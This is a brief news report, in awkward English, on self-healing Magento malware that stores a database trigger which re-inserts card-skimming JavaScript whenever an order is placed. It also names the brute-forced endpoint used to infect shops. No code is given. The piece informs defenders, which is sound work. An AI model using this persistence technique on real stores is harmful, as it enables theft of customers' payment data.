Having found a self-healing malware targeting Magento stores

Recently, Jeroen Boersma has found a new malware attacking online stores on the Magento platform. This malware can self- healing using code hidden in the website’s database. Although this is not the first malware using hidden code but it is the first one written in SQL.

This malware starts execution whenever a user places a new order. When this happens, a malicious database trigger (a set of automated SQL operations, also known as a stored procedure) executes before Magento puts together the PHP code and assembles the page.

This database trigger checks whether the malware's malicious JavaScript code is present in the store's header, footer, and copyright section. In addtion, it also checks various Magento CMS blocks where the malicious code could also reside.

If it doesn't find any traces of its JavaScript code, the database trigger contains instructions that will re-insert it in the site's source code, via a series of SQL operations.

Willem de Groot who analyzed about this malware said that common malware was stored in Databases before and only as text. And we could scan a dump of your database and know whether it contains malicious stuff. But the actual malware is executed inside the Databases. This is the first malware written in SQL.

The common Magento Malware has its JS and PHP component which response for stealing user card information. But the new malware is written in SQL, which ensure it survives as much as possible. And it will attack the Databases instead of e-commerce app.

This malware appears to infect databases fowling brute-force attacks on the /rss/catalog/notifystock/ URL even o completely patched shops.